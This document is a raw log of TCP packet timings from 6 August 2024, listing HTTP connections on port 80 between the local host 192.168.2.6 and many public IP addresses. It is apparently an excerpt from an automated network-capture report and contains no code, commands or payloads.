                                                                                                                                    Aug 6, 2024 10:29:55.863337040 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863409042 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863420010 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863430023 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863440037 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863442898 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863451958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863461971 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863472939 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863472939 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863483906 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863502979 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863694906 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863733053 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863743067 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863763094 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863856077 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863867044 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863878012 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863888979 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863907099 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863924980 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.863967896 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.863979101 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864012003 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864065886 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864077091 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864109993 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864223003 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864259958 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864274025 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864284992 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864336014 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864342928 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864346981 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864357948 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864367962 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864376068 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864406109 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864413977 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864424944 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864434958 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864454985 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864526987 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864537954 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864547968 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864558935 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864564896 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864569902 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864579916 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:55.864588976 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:55.864619970 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.193308115 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193335056 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193347931 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193358898 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193370104 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193380117 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193397999 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193417072 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193427086 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193438053 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193444967 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193470955 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.193506956 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193507910 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.193520069 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193531990 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193546057 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.193548918 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193562984 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193576097 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.193576097 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.193603039 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.199619055 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:29:56.204890013 CEST804975127.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:29:56.205002069 CEST4975180192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:00.751044035 CEST4975380192.168.2.6103.107.217.26
                                                                                                                                    Aug 6, 2024 10:30:00.755827904 CEST8049753103.107.217.26192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.756016970 CEST4975380192.168.2.6103.107.217.26
                                                                                                                                    Aug 6, 2024 10:30:00.756186008 CEST4975380192.168.2.6103.107.217.26
                                                                                                                                    Aug 6, 2024 10:30:00.760916948 CEST8049753103.107.217.26192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.928524017 CEST4975580192.168.2.6119.28.109.132
                                                                                                                                    Aug 6, 2024 10:30:00.933389902 CEST8049755119.28.109.132192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:00.933496952 CEST4975580192.168.2.6119.28.109.132
                                                                                                                                    Aug 6, 2024 10:30:00.933664083 CEST4975580192.168.2.6119.28.109.132
                                                                                                                                    Aug 6, 2024 10:30:00.938394070 CEST8049755119.28.109.132192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.013475895 CEST4975680192.168.2.6163.181.160.235
                                                                                                                                    Aug 6, 2024 10:30:01.018383980 CEST8049756163.181.160.235192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.018520117 CEST4975680192.168.2.6163.181.160.235
                                                                                                                                    Aug 6, 2024 10:30:01.020503998 CEST4975680192.168.2.6163.181.160.235
                                                                                                                                    Aug 6, 2024 10:30:01.025437117 CEST8049756163.181.160.235192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.107023954 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:01.111867905 CEST804975843.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.111987114 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:01.112170935 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:01.116920948 CEST804975843.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.160202026 CEST4975980192.168.2.643.152.186.103
                                                                                                                                    Aug 6, 2024 10:30:01.165195942 CEST804975943.152.186.103192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.165272951 CEST4975980192.168.2.643.152.186.103
                                                                                                                                    Aug 6, 2024 10:30:01.165488005 CEST4975980192.168.2.643.152.186.103
                                                                                                                                    Aug 6, 2024 10:30:01.170253992 CEST804975943.152.186.103192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.222636938 CEST4976080192.168.2.6163.181.42.239
                                                                                                                                    Aug 6, 2024 10:30:01.227454901 CEST8049760163.181.42.239192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.227560997 CEST4976080192.168.2.6163.181.42.239
                                                                                                                                    Aug 6, 2024 10:30:01.227648973 CEST4976080192.168.2.6163.181.42.239
                                                                                                                                    Aug 6, 2024 10:30:01.228009939 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:01.234216928 CEST8049760163.181.42.239192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.234671116 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.234769106 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:01.234885931 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:01.241503000 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.278625965 CEST4976280192.168.2.6104.192.110.226
                                                                                                                                    Aug 6, 2024 10:30:01.285299063 CEST8049762104.192.110.226192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.285379887 CEST4976280192.168.2.6104.192.110.226
                                                                                                                                    Aug 6, 2024 10:30:01.285612106 CEST4976280192.168.2.6104.192.110.226
                                                                                                                                    Aug 6, 2024 10:30:01.290853024 CEST4976380192.168.2.649.51.65.181
                                                                                                                                    Aug 6, 2024 10:30:01.292238951 CEST8049762104.192.110.226192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.297599077 CEST804976349.51.65.181192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.297684908 CEST4976380192.168.2.649.51.65.181
                                                                                                                                    Aug 6, 2024 10:30:01.297822952 CEST4976380192.168.2.649.51.65.181
                                                                                                                                    Aug 6, 2024 10:30:01.304264069 CEST804976349.51.65.181192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.347516060 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:01.354089022 CEST8049764163.171.132.119192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.354259014 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:01.354490995 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:01.361124992 CEST8049764163.171.132.119192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.414371967 CEST4976580192.168.2.6163.181.92.212
                                                                                                                                    Aug 6, 2024 10:30:01.420933008 CEST8049765163.181.92.212192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.421041965 CEST4976580192.168.2.6163.181.92.212
                                                                                                                                    Aug 6, 2024 10:30:01.421246052 CEST4976580192.168.2.6163.181.92.212
                                                                                                                                    Aug 6, 2024 10:30:01.428286076 CEST8049765163.181.92.212192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.533741951 CEST4976680192.168.2.6111.124.200.101
                                                                                                                                    Aug 6, 2024 10:30:01.538640976 CEST8049766111.124.200.101192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.538919926 CEST4976680192.168.2.6111.124.200.101
                                                                                                                                    Aug 6, 2024 10:30:01.538919926 CEST4976680192.168.2.6111.124.200.101
                                                                                                                                    Aug 6, 2024 10:30:01.545644999 CEST8049766111.124.200.101192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.593311071 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:01.598139048 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.598258018 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:01.598654032 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:01.603430033 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.701776981 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:01.706629038 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.706753969 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:01.706893921 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:01.711668968 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.784374952 CEST4976980192.168.2.6163.181.92.232
                                                                                                                                    Aug 6, 2024 10:30:01.789343119 CEST8049769163.181.92.232192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.789422989 CEST4976980192.168.2.6163.181.92.232
                                                                                                                                    Aug 6, 2024 10:30:01.789581060 CEST4976980192.168.2.6163.181.92.232
                                                                                                                                    Aug 6, 2024 10:30:01.794342041 CEST8049769163.181.92.232192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.813071966 CEST4977080192.168.2.647.94.225.221
                                                                                                                                    Aug 6, 2024 10:30:01.818463087 CEST804977047.94.225.221192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.818568945 CEST4977080192.168.2.647.94.225.221
                                                                                                                                    Aug 6, 2024 10:30:01.818819046 CEST4977080192.168.2.647.94.225.221
                                                                                                                                    Aug 6, 2024 10:30:01.823862076 CEST804977047.94.225.221192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.846417904 CEST4977180192.168.2.643.159.118.238
                                                                                                                                    Aug 6, 2024 10:30:01.851226091 CEST804977143.159.118.238192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.851314068 CEST4977180192.168.2.643.159.118.238
                                                                                                                                    Aug 6, 2024 10:30:01.851536036 CEST4977180192.168.2.643.159.118.238
                                                                                                                                    Aug 6, 2024 10:30:01.856322050 CEST804977143.159.118.238192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.913130045 CEST804976349.51.65.181192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:01.915621042 CEST4976380192.168.2.649.51.65.181
                                                                                                                                    Aug 6, 2024 10:30:02.203533888 CEST8049756163.181.160.235192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.203979015 CEST8049764163.171.132.119192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.203993082 CEST8049755119.28.109.132192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.204174042 CEST804975843.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.204260111 CEST804975943.152.186.103192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.204273939 CEST8049765163.181.92.212192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206116915 CEST8049760163.181.42.239192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206144094 CEST8049756163.181.160.235192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206187010 CEST8049764163.171.132.119192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206199884 CEST8049755119.28.109.132192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.206250906 CEST4975680192.168.2.6163.181.160.235
                                                                                                                                    Aug 6, 2024 10:30:02.206389904 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:02.207086086 CEST4975580192.168.2.6119.28.109.132
                                                                                                                                    Aug 6, 2024 10:30:02.211802959 CEST4977280192.168.2.6113.219.142.35
                                                                                                                                    Aug 6, 2024 10:30:02.211998940 CEST4977380192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:30:02.212074995 CEST4977480192.168.2.643.152.186.117
                                                                                                                                    Aug 6, 2024 10:30:02.216996908 CEST8049772113.219.142.35192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.217015028 CEST8049773163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.217025042 CEST804977443.152.186.117192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.217093945 CEST4977380192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:30:02.217093945 CEST4977280192.168.2.6113.219.142.35
                                                                                                                                    Aug 6, 2024 10:30:02.217111111 CEST4977480192.168.2.643.152.186.117
                                                                                                                                    Aug 6, 2024 10:30:02.217871904 CEST4977280192.168.2.6113.219.142.35
                                                                                                                                    Aug 6, 2024 10:30:02.217957973 CEST4977380192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:30:02.218554974 CEST4977480192.168.2.643.152.186.117
                                                                                                                                    Aug 6, 2024 10:30:02.222980022 CEST8049772113.219.142.35192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.224241018 CEST8049773163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.224864960 CEST804977443.152.186.117192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.234812021 CEST804975843.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.234920979 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:02.255029917 CEST4976580192.168.2.6163.181.92.212
                                                                                                                                    Aug 6, 2024 10:30:02.255073071 CEST4976080192.168.2.6163.181.42.239
                                                                                                                                    Aug 6, 2024 10:30:02.255074978 CEST4975980192.168.2.643.152.186.103
                                                                                                                                    Aug 6, 2024 10:30:02.279478073 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:02.279596090 CEST4976580192.168.2.6163.181.92.212
                                                                                                                                    Aug 6, 2024 10:30:02.280993938 CEST4975980192.168.2.643.152.186.103
                                                                                                                                    Aug 6, 2024 10:30:02.284970999 CEST804975843.159.71.118192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.285068989 CEST4975880192.168.2.643.159.71.118
                                                                                                                                    Aug 6, 2024 10:30:02.294171095 CEST4975680192.168.2.6163.181.160.235
                                                                                                                                    Aug 6, 2024 10:30:02.296123981 CEST4976080192.168.2.6163.181.42.239
                                                                                                                                    Aug 6, 2024 10:30:02.296123981 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:02.297897100 CEST4975580192.168.2.6119.28.109.132
                                                                                                                                    Aug 6, 2024 10:30:02.298433065 CEST804977143.159.118.238192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.302134037 CEST8049764163.171.132.119192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.302191019 CEST4976480192.168.2.6163.171.132.119
                                                                                                                                    Aug 6, 2024 10:30:02.302884102 CEST4977180192.168.2.643.159.118.238
                                                                                                                                    Aug 6, 2024 10:30:02.309803963 CEST804977143.159.118.238192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.309886932 CEST4977180192.168.2.643.159.118.238
                                                                                                                                    Aug 6, 2024 10:30:02.438014984 CEST8049769163.181.92.232192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.465292931 CEST4976980192.168.2.6163.181.92.232
                                                                                                                                    Aug 6, 2024 10:30:02.467497110 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:02.473073006 CEST8049775161.117.242.93192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.473184109 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:02.474078894 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:02.478991032 CEST8049775161.117.242.93192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.640244007 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.640259027 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.640269995 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.640281916 CEST8049761103.235.46.96192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.640314102 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:02.640351057 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:02.653475046 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.653851986 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.653959036 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.653971910 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.653986931 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654028893 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654042959 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654057980 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654061079 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.654139996 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.654536009 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654550076 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654565096 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.654596090 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.654596090 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.654875040 CEST4976180192.168.2.6103.235.46.96
                                                                                                                                    Aug 6, 2024 10:30:02.658288956 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.659780979 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.659919024 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.660145044 CEST8049767120.26.110.170192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.660368919 CEST4976780192.168.2.6120.26.110.170
                                                                                                                                    Aug 6, 2024 10:30:02.827135086 CEST804977443.152.186.117192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.831840992 CEST4977480192.168.2.643.152.186.117
                                                                                                                                    Aug 6, 2024 10:30:02.838263035 CEST804977443.152.186.117192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.838388920 CEST4977480192.168.2.643.152.186.117
                                                                                                                                    Aug 6, 2024 10:30:02.992607117 CEST8049762104.192.110.226192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:02.996278048 CEST4976280192.168.2.6104.192.110.226
                                                                                                                                    Aug 6, 2024 10:30:03.022542953 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022572041 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022584915 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022595882 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022607088 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022617102 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022628069 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022638083 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022648096 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022660017 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.022794962 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:03.022794962 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:03.027823925 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.027841091 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.027854919 CEST8049768103.235.46.98192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.027923107 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:03.033241034 CEST4976880192.168.2.6103.235.46.98
                                                                                                                                    Aug 6, 2024 10:30:03.137846947 CEST8049773163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.148612976 CEST4977380192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:30:03.154140949 CEST8049773163.171.208.133192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.156362057 CEST4977380192.168.2.6163.171.208.133
                                                                                                                                    Aug 6, 2024 10:30:03.224100113 CEST8049772113.219.142.35192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.230037928 CEST4977280192.168.2.6113.219.142.35
                                                                                                                                    Aug 6, 2024 10:30:03.451560974 CEST804977047.94.225.221192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.454724073 CEST4977080192.168.2.647.94.225.221
                                                                                                                                    Aug 6, 2024 10:30:03.839942932 CEST8049775161.117.242.93192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.839962959 CEST8049775161.117.242.93192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.840112925 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:03.856537104 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:03.865700960 CEST8049775161.117.242.93192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.865813017 CEST4977580192.168.2.6161.117.242.93
                                                                                                                                    Aug 6, 2024 10:30:03.987652063 CEST8049753103.107.217.26192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:03.991061926 CEST4975380192.168.2.6103.107.217.26
                                                                                                                                    Aug 6, 2024 10:30:04.144637108 CEST8049766111.124.200.101192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:04.147180080 CEST4976680192.168.2.6111.124.200.101
                                                                                                                                    Aug 6, 2024 10:30:04.389259100 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:04.394464970 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:04.394582033 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:04.394711971 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:04.399511099 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752624989 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752639055 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752655983 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752666950 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752676964 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752687931 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752703905 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752702951 CEST4977680192.168.2.627.221.16.149
                                                                                                                                    Aug 6, 2024 10:30:05.752715111 CEST804977627.221.16.149192.168.2.6
                                                                                                                                    Aug 6, 2024 10:30:05.752724886 CEST804977627.221.16.149192.168.2.6
